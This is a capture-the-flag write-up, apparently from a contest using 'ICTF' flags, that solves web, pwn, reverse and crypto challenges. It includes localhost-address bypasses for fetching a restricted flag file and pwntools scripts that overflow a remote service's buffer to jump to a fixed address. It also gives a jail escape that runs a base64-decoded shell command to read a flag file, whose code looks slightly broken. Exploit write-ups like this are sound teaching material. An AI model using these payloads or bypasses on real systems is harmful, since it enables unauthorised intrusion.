Web
get flag 1
题目说明
All you need to do is get the flag at :9001/flag.txt
http://45.79.210.216:5000
解题思路
[http://0.0.0.0:9001/flag.txt](http://0.0.0.0:9001/flag.txt)
get flag 2
题目说明
I have upgraded my server to make it future proof. Let’s see if you can get the flag now. Flag at :9001/flag.txt
http://45.79.216.81:5000
解题思路
http://[::]:9001/flag.txt
Pwn
babyFlow
解题思路
1 2 3 4 5 6 7 8 9
| from pwn import *
p = remote('143.198.219.171',5000) p.recv() g = (0x14+4)*'a'+p32(0x80491fc) p.sendline(g) p.interactive()
|
Gainme
解题思路
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| from pwn import *
context.log_level = 'debug' context.arch = 'i386' p = remote('143.198.219.171',5003) p.recvline() p.recvuntil('Level 0:') p.sendline("ICTF4") p.recvuntil('Level 1:') p.sendline('dasDASQWgjtrkodsc') p.recvuntil('Level 2:') p.sendline(p64(0xDEADBEEF)) p.recvuntil('Level 3:') p.sendline('1') p.interactive()
|
Reverse
Meow
解题思路
1 2 3 4
| data=open("Meow","rb").read() print(data[1::2].decode(errors='ignore'))
|
Crypto
Ancient
题目说明
Found an ancient image file but unable to figure out what this is. Could you help me out?
解题思路
下载的图片需要手动加png文件头
谷歌识图
[https://jsom1.github.io/_challenges/templed](https://jsom1.github.io/_challenges/templed)
一个比赛原题
手动对着表转一下就行
Crypto1
解题思路
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35
| with open("result", 'r', encoding='utf-8') as f: cy = f.read() print(cy) print(len(cy))
def func(f, i): if i<5: out = ord(f) ^ 0x76 ^ 0xAD var1 = (out & 0xAA) >> 1 var2 = 2 * out & 0xAA return var1 | var2 elif i>=5 and i<10: out = ord(f) ^ 0x76 ^ 0xBE var1 = (out & 0xCC) >> 2 var2 = 4 * out & 0xCC return var1 | var2 else: out = ord(f) ^ 0x76 ^ 0xEF var1 = (out & 0xF0) >> 4 var2 = 16 * out & 0xF0 return var1 | var2
dic = {} flag = '' for i in range(15): for j in range(128): t = chr(func(chr(j), i)) if t==cy[i]: print(i, chr(j), j) flag += chr(j) break
print(flag)
|
TheOnlyJail
TheOnlyJail
解题思路
1 2 3 4
| import os import base64
os.system(b64.base64decode("some_base64_encoded_command_like_cat /home/ctf/flag.txt"))
|